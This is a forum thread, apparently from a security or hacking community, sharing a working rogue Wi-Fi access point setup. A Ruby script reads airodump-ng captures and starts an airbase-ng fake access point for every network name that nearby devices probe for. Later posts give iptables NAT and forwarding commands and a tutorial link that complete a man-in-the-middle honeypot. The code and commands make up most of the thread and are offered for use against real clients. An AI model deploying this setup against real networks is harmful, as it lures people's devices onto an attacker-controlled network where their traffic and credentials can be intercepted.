fake ap script... not like karma? its airbase-ng

[i8igmac]

karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid...

#start airodump-ng wlan0 -w airbase
# this will simply scan airbase.csv file for client probe


@pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco"
def refresh_list # read a airodump.csv file and sort threw clients
	data=File.open("airbase-01.csv","r")
	block=data.read
	cut=block.index("\r\n\r\n")
	block_1=block[146..cut] # here is your list of accespoints...
	block_2=block[cut+90..-1] # here is your list of clients 
	buff=[]

	block_2.each_line{|x| buff<< x.split(",")[5..-1]}
	buff.uniq.each{|x|
		if not x==nil

			x.each{|y|
			if not y.include?(":")
				if not y.include?("(not associated)")
					y.map(&:strip).each{|z|
						if z.size>=1
							if not @pid_list.include?(z)
							Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}
							@pid_list<<z
							end
						end
						}
					
				end
			end
			}

		end
	}
end

refresh_list
while true
	sleep 10

	refresh_list
end

[i8igmac]

Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.

Labtop has 2 wifi devices. Wlan1 is connected to droid 4g 192.168.43.130

Wlan0 will be airbase-ng so should I set ifcinfig at0 192.168.44.1 up ? also how would u configure dhcp 192.168.0.100-250???

[i8igmac]

i had to boot up kali to get a working example of a fake ap with dnsmasq...

simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

and dont forget to add iptables to complete your clients internet connection

wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Edited March 16, 2014 by i8igmac

[phpsystems]

Cool script, but have you seen airbase-ng's -P option? My understanding is that it would do much the same thing.

From the web page (http://www.aircrack-ng.org/doku.php?id=airbase-ng):

-P All ProbesThis causes the fake access point to respond to all probes regardless of the ESSIDs specified. Without -P, the old behavior of ignoring probes for non-matching ESSIDs will be used.

Also,

-C SecondsThe -P option must also be specified in order to use this option. The wildcard ESSIDs will also be beaconed this number of seconds. A good typical value to use is ”-C 60”.
When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi? network as Linux/Mac OS X clients which send directed probes.